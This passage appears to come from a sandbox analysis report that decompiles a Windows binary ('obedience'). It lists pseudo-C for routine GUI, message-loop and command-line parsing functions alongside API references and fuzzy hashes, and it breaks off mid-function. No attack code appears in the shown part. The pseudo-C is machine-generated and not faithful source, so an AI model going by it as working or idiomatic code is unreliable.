      						E004262F8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
      						_t137 = E00426B00(_t135);
      						SetTextColor(_t137, 0xffffff);
      						SetBkColor(_t137, 0);
      						_push(0xe20746);
      						_push(0);
      						_push(0);
      						_push(_v12);
      						_push( *((intOrPtr*)(_t118 + 0x30)));
      						_push( *((intOrPtr*)(_t118 + 0x34)));
      						_push(_a12);
      						_t96 = _a16;
      						_push(_t96);
      						_push(_t137);
      						L00407258();
      						return _t96;
      					}
      					_push(_a8);
      					_push(E004517A8(_t142));
      					E00451E6C(_t118, _t142);
      					_push(E004517A8(_t142));
      					_push(0);
      					_push(0);
      					_push(_a12);
      					_push(_a16);
      					_push(E00426B00(__ecx));
      					_push(_v8);
      					_t117 = E00451B70(_t118);
      					_push(_t117);
      					L0042D02C();
      					return _t117;
      				}
      				return _t46;
      			}

      APIs
      • 6F92B410.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00451EF3
      • 6F92B410.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00451F94
      • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00451FE1
      • SetBkColor.GDI32(00000000,00000000), ref: 00451FE9
      • 73BF97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 0045200E
        • Part of subcall function 00451E6C: 6F92B650.COMCTL32(00000000,?,00451ECD,00000000,?), ref: 00451E82
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B410Color$B650Text
      • String ID:
      • API String ID: 964794876-0
      • Opcode ID: fbb7dd54d91da426b147ab033b40a803ce913af3080ec3e1c1b7bd6655ad04f3
      • Instruction ID: 33e19d475e3394ec5f5de1c19d85da5c3af7b9e9a4da3a8edb18f4d6b930c696
      • Opcode Fuzzy Hash: fbb7dd54d91da426b147ab033b40a803ce913af3080ec3e1c1b7bd6655ad04f3
      • Instruction Fuzzy Hash: 3A512871740114AFCB40EF6DDD82F9E37ACAF09314F50016AF914EB296CA78EC45876A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 74%
      			E00461028(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				short _v22;
      				intOrPtr _v28;
      				struct HWND__* _v32;
      				char _v36;
      				intOrPtr _t50;
      				intOrPtr _t56;
      				intOrPtr _t60;
      				intOrPtr _t61;
      				intOrPtr _t62;
      				intOrPtr _t65;
      				intOrPtr _t66;
      				intOrPtr _t68;
      				intOrPtr _t70;
      				intOrPtr _t80;
      				intOrPtr _t82;
      				intOrPtr _t85;
      				void* _t90;
      				void* _t107;
      				intOrPtr _t122;
      				void* _t124;
      				void* _t127;
      				void* _t128;
      				intOrPtr _t129;
      
      				_t125 = __esi;
      				_t124 = __edi;
      				_t107 = __ecx;
      				_t105 = __ebx;
      				_t127 = _t128;
      				_t129 = _t128 + 0xffffffe0;
      				_push(__ebx);
      				_push(__esi);
      				_v36 = 0;
      				_v8 = __eax;
      				_push(_t127);
      				_push(0x4612f0);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t129;
      				E00443188();
      				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
      					_t50 =  *0x48f758; // 0x423b10
      					E00406A3C(_t50, _t107,  &_v36);
      					E0040CBEC(_v36, 1);
      					E004043D0();
      				}
      				if(GetCapture() != 0) {
      					SendMessageA(GetCapture(), 0x1f, 0, 0);
      				}
      				ReleaseCapture();
      				_t56 =  *0x490b7c; // 0x2481268
      				E004635E0(_t56);
      				_push(_t127);
      				_push(0x4612d3);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t129;
      				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
      				_v32 = GetActiveWindow();
      				_t60 =  *0x48ee28; // 0x0
      				_v20 = _t60;
      				_t61 =  *0x490b80; // 0x2480e74
      				_t20 = _t61 + 0x78; // 0x0
      				_t62 =  *0x490b80; // 0x2480e74
      				_t21 = _t62 + 0x7c; // 0x24810b8
      				E00419D08( *_t21,  *_t20, 0);
      				_t65 =  *0x490b80; // 0x2480e74
      				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
      				_t66 =  *0x490b80; // 0x2480e74
      				_t24 = _t66 + 0x44; // 0x0
      				_v22 =  *_t24;
      				_t68 =  *0x490b80; // 0x2480e74
      				E004625B4(_t68,  *_t20, 0);
      				_t70 =  *0x490b80; // 0x2480e74
      				_t26 = _t70 + 0x48; // 0x0
      				_v28 =  *_t26;
      				_v16 = E0045B38C(0, _t105, _t124, _t125);
      				_push(_t127);
      				_push(0x4612b1);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t129;
      				E00460F78(_v8);
      				_push(_t127);
      				_push(0x461210);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t129;
      				SendMessageA(E0044B158(_v8), 0xb000, 0, 0);
      				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
      				do {
      					_t80 =  *0x490b7c; // 0x2481268
      					E00464490(_t80, _t124, _t125);
      					_t82 =  *0x490b7c; // 0x2481268
      					if( *((char*)(_t82 + 0x9c)) == 0) {
      						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
      							E00460ED8(_v8);
      						}
      					} else {
      						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
      					}
      					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
      				} while (_t85 == 0);
      				_v12 = _t85;
      				SendMessageA(E0044B158(_v8), 0xb001, 0, 0);
      				_t90 = E0044B158(_v8);
      				if(_t90 != GetActiveWindow()) {
      					_v32 = 0;
      				}
      				_pop(_t122);
      				 *[fs:eax] = _t122;
      				_push(0x461217);
      				return E00460F70();
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CaptureMessageSend$ActiveWindow$Release
      • String ID:
      • API String ID: 862346643-0
      • Opcode ID: e43c448457db158af6f860a78a1aec7c6a637e95adce187c29c270043eda830b
      • Instruction ID: 6fe5ce7e953383ce26337cdb57cc380d8a638604ab8120e7ef56e8edb22a3aac
      • Opcode Fuzzy Hash: e43c448457db158af6f860a78a1aec7c6a637e95adce187c29c270043eda830b
      • Instruction Fuzzy Hash: 69515D30A00244AFDB10EFAAC956B9E77F1EB49304F1484BAF400A77B1E779AD40DB49
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0044916C(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
      				int _v8;
      				int _v12;
      				int _v16;
      				char _v20;
      				struct tagRECT _v36;
      				signed int _t54;
      				intOrPtr _t59;
      				int _t61;
      				void* _t63;
      				void* _t66;
      				void* _t82;
      				int _t97;
      				struct HDC__* _t98;
      
      				_t98 = __edx;
      				_t82 = __eax;
      				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
      				_v16 = SaveDC(__edx);
      				E00443264(__edx, _a4, __ecx);
      				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
      				_t97 = 0;
      				_v12 = 0;
      				if((GetWindowLongA(E0044B158(_t82), 0xffffffec) & 0x00000002) == 0) {
      					_t54 = GetWindowLongA(E0044B158(_t82), 0xfffffff0);
      					__eflags = _t54 & 0x00800000;
      					if((_t54 & 0x00800000) != 0) {
      						_v12 = 3;
      						_t97 = 0xa00f;
      					}
      				} else {
      					_v12 = 0xa;
      					_t97 = 0x200f;
      				}
      				if(_t97 != 0) {
      					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
      					DrawEdge(_t98,  &_v36, _v12, _t97);
      					E00443264(_t98, _v36.top, _v36.left);
      					IntersectClipRect(_t98, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
      				}
      				E00445AE8(_t82, _t98, 0x14, 0);
      				_t86 = _t98;
      				E00445AE8(_t82, _t98, 0xf, 0);
      				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
      				if(_t59 == 0) {
      					L12:
      					_t61 = RestoreDC(_t98, _v16);
      					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
      					return _t61;
      				} else {
      					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
      					if(_t63 < 0) {
      						goto L12;
      					}
      					_v20 = _t63 + 1;
      					_v8 = 0;
      					do {
      						_t66 = E00419C84( *((intOrPtr*)(_t82 + 0x19c)), _t86, _v8);
      						_t106 =  *((char*)(_t66 + 0x57));
      						if( *((char*)(_t66 + 0x57)) != 0) {
      							_t86 =  *(_t66 + 0x40);
      							E0044916C(_t66,  *(_t66 + 0x40), _t98, _t106,  *((intOrPtr*)(_t66 + 0x44)));
      						}
      						_v8 = _v8 + 1;
      						_t36 =  &_v20;
      						 *_t36 = _v20 - 1;
      					} while ( *_t36 != 0);
      					goto L12;
      				}
      			}

      APIs
      • SaveDC.GDI32 ref: 00449182
        • Part of subcall function 00443264: GetWindowOrgEx.GDI32(?), ref: 00443272
        • Part of subcall function 00443264: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00443288
      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004491A3
      • GetWindowLongA.USER32 ref: 004491B9
      • GetWindowLongA.USER32 ref: 004491DB
      • SetRect.USER32 ref: 00449207
      • DrawEdge.USER32(?,?,?,00000000), ref: 00449216
      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044923B
      • RestoreDC.GDI32(?,?), ref: 004492AC
      Similarity
      • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
      • String ID:
      • API String ID: 2976466617-0
      • Opcode ID: 3acfa5b0b9ff9411f3361fbec3035ec8b829c0245da8772f889df54ece62c4d7
      • Instruction ID: 52e790bc8cb44e8baad99bf0852b804c86b50f0f56aaa9ca2e677c51477d291d
      • Opcode Fuzzy Hash: 3acfa5b0b9ff9411f3361fbec3035ec8b829c0245da8772f889df54ece62c4d7
      • Instruction Fuzzy Hash: 38416271B04205ABEB00EB99CC85F9F77A9AF44704F10416AFA04EB386D678ED01C7A9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 26%
      			E00427444(void* __ebx) {
      				intOrPtr _v8;
      				char _v1000;
      				char _v1004;
      				char _v1032;
      				signed int _v1034;
      				short _v1036;
      				void* _t24;
      				intOrPtr _t25;
      				intOrPtr _t27;
      				intOrPtr _t29;
      				intOrPtr _t45;
      				intOrPtr _t52;
      				void* _t54;
      				void* _t55;
      
      				_t54 = _t55;
      				_v1036 = 0x300;
      				_v1034 = 0x10;
      				_t25 = E00402CEC(_t24, 0x40,  &_v1032);
      				_push(0);
      				L00407658();
      				_v8 = _t25;
      				_push(_t54);
      				_push(0x427541);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t55 + 0xfffffbf8;
      				_push(0x68);
      				_t27 = _v8;
      				_push(_t27);
      				L00407348();
      				_t45 = _t27;
      				if(_t45 >= 0x10) {
      					_push( &_v1032);
      					_push(8);
      					_push(0);
      					_push(_v8);
      					L00407388();
      					if(_v1004 != 0xc0c0c0) {
      						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
      						_push(8);
      						_push(_t45 - 8);
      						_push(_v8);
      						L00407388();
      					} else {
      						_push( &_v1004);
      						_push(1);
      						_push(_t45 - 8);
      						_push(_v8);
      						L00407388();
      						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
      						_push(7);
      						_push(_t45 - 7);
      						_push(_v8);
      						L00407388();
      						_push( &_v1000);
      						_push(1);
      						_push(7);
      						_push(_v8);
      						L00407388();
      					}
      				}
      				_pop(_t52);
      				 *[fs:eax] = _t52;
      				_push(0x427548);
      				_t29 = _v8;
      				_push(_t29);
      				_push(0);
      				L004078C0();
      				return _t29;
      			}

      APIs
      • 73BEAC50.USER32(00000000), ref: 00427472
      • 73BEAD70.GDI32(?,00000068,00000000,00427541,?,00000000), ref: 0042748E
      • 73BEAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00427541,?,00000000), ref: 004274AD
      • 73BEAEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00427541,?,00000000), ref: 004274D1
      • 73BEAEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00427541), ref: 004274EF
      • 73BEAEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00427503
      • 73BEAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00427541,?,00000000), ref: 00427523
      • 73BEB380.USER32(00000000,?,00427548,00427541,?,00000000), ref: 0042753B
      Similarity
      • API ID: B380
      • String ID:
      • API String ID: 120756276-0
      • Opcode ID: cc7c03f1a2ab2de69333b56a7bd7be1330be001eed7115c847ec77fd40f2dcd9
      • Instruction ID: d546bd5911e6e687bcc28058ebe3c79f855e3ef3cc14b65ac5f4fc5cab1ab855
      • Opcode Fuzzy Hash: cc7c03f1a2ab2de69333b56a7bd7be1330be001eed7115c847ec77fd40f2dcd9
      • Instruction Fuzzy Hash: 392146B1A44318BBEB50DB95CD85F9E73ACEB08704F9004A6BB04F65C1D67DAE40D729
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00402D2C(CHAR* __eax, CHAR* __edx) {
      				char _t67;
      				char _t68;
      				char _t69;
      				CHAR** _t74;
      				CHAR** _t75;
      				void* _t76;
      				void* _t77;
      				CHAR** _t78;
      
      				_t78[1] = __edx;
      				 *_t78 = __eax;
      				_t75 = _t78;
      				_t74 =  &(_t78[5]);
      				while(1) {
					L2:
					/* skip leading whitespace/control characters (anything <= 0x20) */
					_t67 =  *( *_t75);
					if(_t67 != 0 && _t67 <= 0x20) {
						 *_t75 = CharNextA( *_t75);
					}
      					L4:
      					if( *( *_t75) != 0x22 || ( *_t75)[1] != 0x22) {
      						_t76 = 0;
      						_t78[3] =  *_t75;
      						while( *( *_t75) > 0x20) {
      							if( *( *_t75) != 0x22) {
      								 *_t74 = CharNextA( *_t75);
      								_t76 = _t76 +  *_t74 -  *_t75;
      								 *_t75 =  *_t74;
      								continue;
      							}
      							 *_t75 = CharNextA( *_t75);
      							while(1) {
      								_t69 =  *( *_t75);
      								if(_t69 == 0 || _t69 == 0x22) {
      									break;
      								}
      								 *_t74 = CharNextA( *_t75);
      								_t76 = _t76 +  *_t74 -  *_t75;
      								 *_t75 =  *_t74;
      							}
      							if( *( *_t75) != 0) {
      								 *_t75 = CharNextA( *_t75);
      							}
      						}
      						E0040508C(_t78[1], _t76);
      						 *_t75 = _t78[3];
      						_t78[4] =  *(_t78[1]);
      						_t77 = 0;
      						while( *( *_t75) > 0x20) {
      							if( *( *_t75) != 0x22) {
      								 *_t74 = CharNextA( *_t75);
      								if( *_t75 >=  *_t74) {
      									continue;
      								} else {
      									goto L27;
      								}
      								do {
      									L27:
      									_t78[4][_t77] =  *( *_t75);
      									 *_t75 =  &(( *_t75)[1]);
      									_t77 = _t77 + 1;
      								} while ( *_t75 <  *_t74);
      								continue;
      							}
      							 *_t75 = CharNextA( *_t75);
      							while(1) {
      								_t68 =  *( *_t75);
      								if(_t68 == 0 || _t68 == 0x22) {
      									break;
      								}
      								 *_t74 = CharNextA( *_t75);
      								if( *_t75 >=  *_t74) {
      									continue;
      								} else {
      									goto L21;
      								}
      								do {
      									L21:
      									_t78[4][_t77] =  *( *_t75);
      									 *_t75 =  &(( *_t75)[1]);
      									_t77 = _t77 + 1;
      								} while ( *_t75 <  *_t74);
      							}
      							if( *( *_t75) != 0) {
      								 *_t75 = CharNextA( *_t75);
      							}
      						}
      						_t78[2] =  *_t75;
      						return _t78[2];
      					} else {
      						 *_t75 =  &(( *_t75)[2]);
      						continue;
      					}
      				}
      			}

      APIs
      • CharNextA.USER32(00000000), ref: 00402D81
      • CharNextA.USER32(00000000,00000000), ref: 00402D8D
      • CharNextA.USER32(00000000,00000000), ref: 00402DB5
      • CharNextA.USER32(00000000), ref: 00402DC1
      • CharNextA.USER32(?,00000000), ref: 00402E02
      • CharNextA.USER32(00000000,?,00000000), ref: 00402E0E
      • CharNextA.USER32(00000000,?,00000000), ref: 00402E46
      • CharNextA.USER32(?,00000000), ref: 00402E52
      Similarity
      • API ID: CharNext
      • String ID:
      • API String ID: 3213498283-0
      • Opcode ID: 6252eb7603d649577013b2efeb46e2bef314ce5544348e3ca664e00b611efba3
      • Instruction ID: 7891acf85811cc4b8523932fc2b4f811fc19060ffb6a2a7212bb7b5e58fd355c
      • Opcode Fuzzy Hash: 6252eb7603d649577013b2efeb46e2bef314ce5544348e3ca664e00b611efba3
      • Instruction Fuzzy Hash: 67510D70A442829FD371DF68C588A15BBE1EF5A340B640CAEE4C5EB3D2D378AC40DB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 69%
      			E00414E1C(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
      				signed short* _v8;
      				signed int _v12;
      				char _v13;
      				signed int _v16;
      				signed int _v18;
      				void* _v24;
      				char _v28;
      				signed int _v44;
      				void* __ebp;
      				signed short _t136;
      				signed short* _t256;
      				intOrPtr _t307;
      				intOrPtr _t310;
      				intOrPtr _t318;
      				intOrPtr _t325;
      				intOrPtr _t333;
      				signed int _t338;
      				void* _t346;
      				void* _t348;
      				intOrPtr _t349;
      
      				_t353 = __fp0;
      				_t346 = _t348;
      				_t349 = _t348 + 0xffffffd8;
      				_v12 = __ecx;
      				_v8 = __edx;
      				_t256 = __eax;
      				_v13 = 1;
      				_t338 =  *((intOrPtr*)(__eax));
      				if((_t338 & 0x00000fff) >= 0x10f) {
      					_t136 =  *_v8;
      					if(_t136 != 0) {
      						if(_t136 != 1) {
      							if(E00415A04(_t338,  &_v24) != 0) {
      								_push( &_v18);
      								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
      									_t341 =  *_v8;
      									if(( *_v8 & 0x00000fff) >= 0x10f) {
      										_t98 =  &_v28; // 0x414a4b
      										if(E00415A04(_t341, _t98) != 0) {
      											_push( &_v16);
      											_t101 =  &_v28; // 0x414a4b
      											if( *((intOrPtr*)( *((intOrPtr*)( *_t101)) + 4))() == 0) {
      												E0040FD48(0xb);
      												goto L46;
      											} else {
      												if( *_t256 == _v16) {
      													_t123 =  &_v28; // 0x414a4b
      													_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t123)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
      													goto L46;
      												} else {
      													_push( &_v44);
      													L0040EE10();
      													_push(_t346);
      													_push(0x4151fd);
      													_push( *[fs:eax]);
      													 *[fs:eax] = _t349;
      													_t268 = _v16 & 0x0000ffff;
      													E00410AEC( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
      													if(_v44 != _v16) {
      														E0040FC58(_t268);
      													}
      													_t112 =  &_v28; // 0x414a4b
      													_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t112)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
      													_pop(_t307);
      													 *[fs:eax] = _t307;
      													_push(0x415230);
      													return E004104E4( &_v44);
      												}
      											}
      										} else {
      											E0040FD48(0xb);
      											goto L46;
      										}
      									} else {
      										_push( &_v44);
      										L0040EE10();
      										_push(_t346);
      										_push(0x415147);
      										_push( *[fs:eax]);
      										 *[fs:eax] = _t349;
      										_t273 =  *_v8 & 0x0000ffff;
      										E00410AEC( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
      										if( *_v8 != _v44) {
      											E0040FC58(_t273);
      										}
      										_v13 = E00414C90( &_v44, _v12, _v8, _t353);
      										_pop(_t310);
      										 *[fs:eax] = _t310;
      										_push(0x415230);
      										return E004104E4( &_v44);
      									}
      								} else {
      									if( *_v8 == _v18) {
      										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
      										goto L46;
      									} else {
      										_push( &_v44);
      										L0040EE10();
      										_push(_t346);
      										_push(0x4150a5);
      										_push( *[fs:eax]);
      										 *[fs:eax] = _t349;
      										_t278 = _v18 & 0x0000ffff;
      										E00410AEC( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
      										if(_v44 != _v18) {
      											E0040FC58(_t278);
      										}
      										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
      										_pop(_t318);
      										 *[fs:eax] = _t318;
      										_push(0x415230);
      										return E004104E4( &_v44);
      									}
      								}
      							} else {
      								E0040FD48(__ecx);
      								goto L46;
      							}
      						} else {
      							_v13 = E00414A70(_v12, 2);
      							goto L46;
      						}
      					} else {
      						_v13 = E00414A5C(0, 1);
      						goto L46;
      					}
      				} else {
      					if(_t338 != 0) {
      						if(_t338 != 1) {
      							_t7 =  &_v28; // 0x414a4b
      							if(E00415A04( *_v8, _t7) != 0) {
      								_push( &_v16);
      								_t10 =  &_v28; // 0x414a4b
      								if( *((intOrPtr*)( *((intOrPtr*)( *_t10)) + 4))() == 0) {
      									_push( &_v44);
      									L0040EE10();
      									_push(_t346);
      									_push(0x414fb5);
      									_push( *[fs:eax]);
      									 *[fs:eax] = _t349;
      									_t284 =  *_t256 & 0x0000ffff;
      									E00410AEC( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
      									if((_v44 & 0x00000fff) !=  *_t256) {
      										E0040FC58(_t284);
      									}
      									_v13 = E00414C90(_t256, _v12,  &_v44, _t353);
      									_pop(_t325);
      									 *[fs:eax] = _t325;
      									_push(0x415230);
      									return E004104E4( &_v44);
      								} else {
      									if( *_t256 == _v16) {
      										_t32 =  &_v28; // 0x414a4b
      										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t32)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
      										goto L46;
      									} else {
      										_push( &_v44);
      										L0040EE10();
      										_push(_t346);
      										_push(0x414f27);
      										_push( *[fs:eax]);
      										 *[fs:eax] = _t349;
      										_t289 = _v16 & 0x0000ffff;
      										E00410AEC( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
      										if((_v44 & 0x00000fff) != _v16) {
      											E0040FC58(_t289);
      										}
      										_t21 =  &_v28; // 0x414a4b
      										_v13 =  *((intOrPtr*)(0x48e364 + _v12 * 2 + ( *((intOrPtr*)( *((intOrPtr*)( *_t21)) + 0x34))(_v12) & 0x0000007f) - 0x1c));
      										_pop(_t333);
      										 *[fs:eax] = _t333;
      										_push(0x415230);
      										return E004104E4( &_v44);
      									}
      								}
      							} else {
      								E0040FD48(__ecx);
      								goto L46;
      							}
      						} else {
      							_v13 = E00414A70(_v12, 0);
      							goto L46;
      						}
      					} else {
      						_v13 = E00414A5C(1, 0);
      						L46:
      						return _v13;
      					}
      				}
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID: KJA
      • API String ID: 0-2294508986
      • Opcode ID: 85e3309fb15b4a9f1f27f14b91de77616cce60323e4ff3a91297070ddf108b2d
      • Instruction ID: ec51f36f6ba780754a7a8d35addf012dfccb9b9b5852bcd2f8c3e16a96cd157d
      • Opcode Fuzzy Hash: 85e3309fb15b4a9f1f27f14b91de77616cce60323e4ff3a91297070ddf108b2d
      • Instruction Fuzzy Hash: 2BD19439A00249DFCB10EF95C4819EEBBB5EF89310F5444A6E840A7351D738AEC6DB79
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 86%
      			E00476988(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				char _v12;
      				char _v16;
      				intOrPtr _v20;
      				intOrPtr _v28;
      				void* _v32;
      				struct tagPOINT _v40;
      				void* _t55;
      				void* _t56;
      				signed char _t60;
      				struct HWND__* _t61;
      				void* _t64;
      				void* _t66;
      				struct HWND__* _t73;
      				signed short _t80;
      				void* _t89;
      				int _t93;
      				long _t106;
      				intOrPtr* _t112;
      				intOrPtr _t123;
      				intOrPtr _t124;
      				void* _t132;
      				signed char* _t141;
      				void* _t144;
      				void* _t145;
      				struct HWND__* _t148;
      				void* _t152;
      
      				_v16 = 0;
      				_t144 = __edx;
      				_t112 = __eax;
      				_push(_t152);
      				_push(0x476b87);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t152 + 0xffffffdc;
      				E00449440(__eax, 0, __edx, __eflags);
      				if(E00476BB8(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
      					L22:
      					_pop(_t123);
      					 *[fs:eax] = _t123;
      					_push(0x476b8e);
      					return E00404A40( &_v16);
      				} else {
      					_t124 =  *((intOrPtr*)(_t144 + 8));
      					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
      					if(_t55 == 0) {
      						 *((char*)(_t112 + 0x295)) = 1;
      						goto L22;
      					}
      					_t56 = _t55 - 4;
      					if(_t56 == 0) {
      						_t57 = _t124;
      						_t141 =  *(_t124 + 0x14);
      						__eflags =  *_t141 & 0x00000001;
      						if(( *_t141 & 0x00000001) != 0) {
      							_t145 = E0047950C(_t112,  *((intOrPtr*)(_t57 + 0xc)));
      							_t60 =  *(_t145 + 0x18);
      							__eflags = _t60 - _t141[4];
      							if(_t60 < _t141[4]) {
      								_t61 =  *(_t145 + 0x14);
      								__eflags = _t61;
      								if(_t61 > 0) {
      									__eflags = _t61 - _t141[4];
      									if(_t61 <= _t141[4]) {
      										_t141[4] = _t61;
      									}
      								}
      							} else {
      								_t141[4] = _t60;
      							}
      							E00473FE4(_t145, _t141[4]);
      						}
      					} else {
